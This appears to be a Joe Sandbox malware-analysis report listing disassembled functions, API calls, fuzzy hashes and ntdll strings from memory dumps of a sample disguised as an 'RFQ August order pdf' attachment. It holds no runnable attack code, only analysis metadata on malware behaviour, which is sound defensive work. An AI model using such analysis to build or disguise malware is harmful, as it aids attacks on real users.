LdrInitializeThunk.NTDLL ref: 01612D3A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e7f4418103e1423287e7ebe8b93eec6f2de92969256f1b8138cf34553198460c
Instruction ID: 5bd3f11c1d170827f026bdc04e54e6b636cb1c3d86ede53c1f2a3267f43177a5
Opcode Fuzzy Hash: e7f4418103e1423287e7ebe8b93eec6f2de92969256f1b8138cf34553198460c
Instruction Fuzzy Hash: 9A90022130181003D14075585C196074049E7E1301F55D011E4414658DDD1589565722

Function 01612D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612D1A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 680cd5e01ab0f0d4f2b1e24d00b39fca9420e5dc4be62eb81a2c196a04d892d7
Instruction ID: d6b9c97ea60c09f22b0e332a2be958f2e17ba507b666c18a5201ff19916f81f5
Opcode Fuzzy Hash: 680cd5e01ab0f0d4f2b1e24d00b39fca9420e5dc4be62eb81a2c196a04d892d7
Instruction Fuzzy Hash: 8890022921381002D18075585C0960B004997D1202F95D415E401565CDCD1589695721

Function 01612DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612DFA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6215539effea25498739c4f86c52e40957075287f3772b355c5e7502994ac92d
Instruction ID: b5e063e97dac60862e39fc2274650432662772cdad3c4ab3eaf8be652ac7df7a
Opcode Fuzzy Hash: 6215539effea25498739c4f86c52e40957075287f3772b355c5e7502994ac92d
Instruction Fuzzy Hash: E690023120181413D11175584D05707004D97D0241F95C412E442465CEDA568A52A621

Function 01612DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612DDA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4400ff1e14956eea25af7eecb98d9736066453191c0edc1d5d29e80993a733b
Instruction ID: ae755583a0ad4ee051405baf45d47e3c91f5a886c01832cfb6b0df815340851f
Opcode Fuzzy Hash: d4400ff1e14956eea25af7eecb98d9736066453191c0edc1d5d29e80993a733b
Instruction Fuzzy Hash: D1900221242851525545B5584C05507404AA7E0241795C012E5414A54DC9269956DB21

Function 01612C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612C7A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e293fe5b84ac368a4a0bdfe12cddbe9cfc2362aa6d56c4605eddc10e2a687b0
Instruction ID: f889ed1cfa4773b280cc71c7ddb9c411a150ecaafc2c97523976c8b5e050171b
Opcode Fuzzy Hash: 2e293fe5b84ac368a4a0bdfe12cddbe9cfc2362aa6d56c4605eddc10e2a687b0
Instruction Fuzzy Hash: 8D90023120189802D11075588C0574B004997D0301F59C411E842475CECA9589917621

Function 01612CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612CAA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b590c29623a8487feeb08961c2722d046e05bf47ca0f82eb515fd1136e90bdf1
Instruction ID: 0fd791b217d23798141692c51e5c8413608df0afa7fbeadf5a6ef1ae70b95c60
Opcode Fuzzy Hash: b590c29623a8487feeb08961c2722d046e05bf47ca0f82eb515fd1136e90bdf1
Instruction Fuzzy Hash: 2C90023120181402D10079985C09647004997E0301F55D011E9024659FCA6589916631

Function 01612F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612F3A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9829b8bf5b8e49ab88216082e65ba67f6f910999e325e689a092d116a0d1a210
Instruction ID: b02df82243e4eb097a483bfb82dd66210e51dec4323e80a516f33e0624d75724
Opcode Fuzzy Hash: 9829b8bf5b8e49ab88216082e65ba67f6f910999e325e689a092d116a0d1a210
Instruction Fuzzy Hash: 3F90026134181442D10075584C15B070049D7E1301F55C015E5064658ECA19CD526626

Function 01612FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612FEA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bf99e8023c779d4a2067d628ea230ef158ef8fa55ca9a121b4c6568d671f9775
Instruction ID: 8d61b361bc60a45343750d85b577a1da4f5651c903fc5cc6c0ab952afb5a6e06
Opcode Fuzzy Hash: bf99e8023c779d4a2067d628ea230ef158ef8fa55ca9a121b4c6568d671f9775
Instruction Fuzzy Hash: 5B900221211C1042D20079684C15B07004997D0303F55C115E4154658DCD1589615A21

Function 01612FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612FBA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0c5394b77865c7da7c55607b7c92e9f0e77b2661c0030382121dac99ddf6a8b2
Instruction ID: fb37c67d5be50593c08bd7c6394e8be4d678b1f3622c3447bb98d6c822d377d6
Opcode Fuzzy Hash: 0c5394b77865c7da7c55607b7c92e9f0e77b2661c0030382121dac99ddf6a8b2
Instruction Fuzzy Hash: B390022160181042414075688C459074049BBE1211755C121E4998654EC95989655B65

Function 01612F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612F9A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e2163b064879e2f613defe4685261441c2e98b8a9ef24ab30a0f9a0fb06ca3c
Instruction ID: 73f74937a717ec2f65fe6866114243ac865205125b951366e627f7c81cecb004
Opcode Fuzzy Hash: 8e2163b064879e2f613defe4685261441c2e98b8a9ef24ab30a0f9a0fb06ca3c
Instruction Fuzzy Hash: E4900231201C1402D10075584C1570B004997D0302F55C011E5164659ECA2589516A71

Function 01612EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612EAA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e55256d0dc0c1f6415fc9f319ab0d1dfc82484d633d7d636122bdd20f050617
Instruction ID: bf36bbdc61ccc0d6d2b07e5664eb95841635d23c8cd1ab6a19a7446d1b91be6a
Opcode Fuzzy Hash: 4e55256d0dc0c1f6415fc9f319ab0d1dfc82484d633d7d636122bdd20f050617
Instruction Fuzzy Hash: 6890027120181402D14075584C05747004997D0301F55C011E9064658FCA598ED56B65

Function 01612E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612E8A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fc68f86644d78a36b620b12ff5e532c25be8d73f6141186aece8094a3357b29
Instruction ID: 20c487206ed887156b1a66d173fba9dccda979343c72250b43d1abd58805ff17
Opcode Fuzzy Hash: 3fc68f86644d78a36b620b12ff5e532c25be8d73f6141186aece8094a3357b29
Instruction Fuzzy Hash: 1B90022160181502D10175584C05617004E97D0241F95C022E5024659FCE258A92A631

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

Function 0041A654 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: b8a82d016ecea4c601ee8f844ae300fe942f8e5158987a13f4a94ae5b36b22b7
Instruction ID: 9a68ffff990cfe6e8a48a695b293a9f0dccae37181ad61f6abb268592f819411
Opcode Fuzzy Hash: b8a82d016ecea4c601ee8f844ae300fe942f8e5158987a13f4a94ae5b36b22b7
Instruction Fuzzy Hash: 6ED05EB02001156FDB00EE65DD44DEB3369EF94769B008809F80C87286C535D8228AF9

Function 0041A65D Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 915a83f1b3779bf60b7181ed9f1a42e32a57efb2612bea7e10179f84008fcdac
Instruction ID: 78a45fc52cb4068f7608ec27cdfcfb5e39da6c5975fbae3fa46a6759a0b3504d
Opcode Fuzzy Hash: 915a83f1b3779bf60b7181ed9f1a42e32a57efb2612bea7e10179f84008fcdac
Instruction Fuzzy Hash: BBF05EB42012046FC714EF65CC45DD73768EF85314F018559FD5C9B242D534E9218AF5

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

Function 0041A692 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 6a91b438980893ffe97dfe52c5caf63128fae3574a64304373f43f4e23832977
Instruction ID: 12e8e60550344934db578493029d6ecc082f7fed03a1c1c5fc236a3eda326037
Opcode Fuzzy Hash: 6a91b438980893ffe97dfe52c5caf63128fae3574a64304373f43f4e23832977
Instruction Fuzzy Hash: DEE086752102157BD711DF98CC45FC77B989F48750F118054F93C5F342C630E6028AE6

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

Function 01612C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01612C24

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5385377a252eb7e428f3053945a822a2edf85bde3d7c9845e2b22acac658ff25
Instruction ID: bfc8d285e806f97f66db87fa9c27ab3b297db8c9477e2633a6197d8b33fc86af
Opcode Fuzzy Hash: 5385377a252eb7e428f3053945a822a2edf85bde3d7c9845e2b22acac658ff25
Instruction Fuzzy Hash: A3B09B719019D5C6DA51E7644E09717795477D0701F29C065D3030755F4738C1D1E675

Non-executed Functions

Function 01652349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

TracingFlags, xrefs: 01652549
GlobalFlag, xrefs: 01652F3F, 01653059
FrontEndHeapDebugOptions, xrefs: 01652489
DisableHeapLookaside, xrefs: 0165246D
MinimumStackCommitInBytes, xrefs: 01652BB0
ExecuteOptions, xrefs: 016525A0
DisableExceptionChainValidation, xrefs: 0165275F
MaxLoaderThreads, xrefs: 016524EC
LdrpInitializeExecutionOptions, xrefs: 0165317D
UseImpersonatedDeviceMap, xrefs: 0165251C
UnloadEventTraceDepth, xrefs: 016524C0
@, xrefs: 01652B74
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01653176
@, xrefs: 01652942
MaxDeadActivationContexts, xrefs: 01652D82
minkernel\ntdll\ldrinit.c, xrefs: 01653187
ShutdownFlags, xrefs: 016524A1
GlobalFlag2, xrefs: 01652FC0
CFGOptions, xrefs: 01652967
RaiseExceptionOnPossibleDeadlock, xrefs: 01652579

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: bfed40601b1ff37c0eadcf832ed88a30c65c19888fabfdc8e5d64f14deae2cc2
Instruction ID: 804dca72e213655456e686defb0aa09484388f1a65793a2254d2b18440f171a0
Opcode Fuzzy Hash: bfed40601b1ff37c0eadcf832ed88a30c65c19888fabfdc8e5d64f14deae2cc2
Instruction Fuzzy Hash: E8928871608342EFE761CE29CC90B6BBBE9BB84754F04492DFA959B350D770E844CB92

Function 01608620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section address., xrefs: 01645502
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016454E2
Thread identifier, xrefs: 0164553A
Thread is in a state in which it cannot own a critical section, xrefs: 01645543
Critical section debug info address, xrefs: 0164541F, 0164552E
Critical section address, xrefs: 01645425, 016454BC, 01645534
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0164540A, 01645496, 01645519
Address of the debug info found in the active list., xrefs: 016454AE, 016454FA
double initialized or corrupted critical section, xrefs: 01645508
8, xrefs: 016452E3
corrupted critical section, xrefs: 016454C2
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016454CE
Invalid debug info address of this critical section, xrefs: 016454B6
undeleted critical section in freed memory, xrefs: 0164542B

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: b8721c5955981400fc2b8b3e4073b64cfb70a5296025ace89b2730d361ab3a38
Instruction ID: 4a10e43ff90a70322e720f84d1c73139cb591d2c6e11b811d0e77094add00023
Opcode Fuzzy Hash: b8721c5955981400fc2b8b3e4073b64cfb70a5296025ace89b2730d361ab3a38
Instruction Fuzzy Hash: BA819EB1A01359EFDB21CF99CC81BAEBBB9FB48714F244119F505BB280D3B5A941CB90

Function 016029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01642498
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01642602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016425EB
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01642624
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016424C0
RtlpResolveAssemblyStorageMapEntry, xrefs: 0164261F
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016422E4
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01642506
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01642409
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01642412
@, xrefs: 0164259B

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 1e6cf3e519f7eebb7bdc01fe82eb0703b746f2711c5f6a579e24b9bdff4396f8
Instruction ID: f24d9719fd9955d94a87c832b878b2678c9e76e8e4842292e42b447d542e3e78
Opcode Fuzzy Hash: 1e6cf3e519f7eebb7bdc01fe82eb0703b746f2711c5f6a579e24b9bdff4396f8
Instruction Fuzzy Hash: A30280F1D002299BDB66DB54CC94BEAB7B8AF54304F1041DEE609A7281EB309E84CF59

Function 01678B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

lsass.exe, xrefs: 01678BA1
svchost.exe, xrefs: 01678B68
heapType, xrefs: 01678BCB
DefaultBrowser_NOPUBLISHERID, xrefs: 01678D00
runtimebroker.exe, xrefs: 01678B73
SegmentHeap, xrefs: 01678BE9
services.exe, xrefs: 01678B96
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01678BD0
smss.exe, xrefs: 01678B8B
csrss.exe, xrefs: 01678B80

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: e385bf7d89a54f49574282a5653c58cddb8e09c002203216ccfc281e3eb6a299
Instruction ID: 4f4f072ff6867206a9175d6726922c3329acdb9006c081b382758ad3c807b54a
Opcode Fuzzy Hash: e385bf7d89a54f49574282a5653c58cddb8e09c002203216ccfc281e3eb6a299
Instruction Fuzzy Hash: 3751C0726043029BD329DF188C48BABBBECFF98640F544A1DFA59C7241E770DA05CB92

Function 01680274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 016805F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 016806EA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 016804D3
RtlReAllocateHeap, xrefs: 016802BF, 01680362
About to reallocate block at %p to %Ix bytes, xrefs: 016803BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0168069F
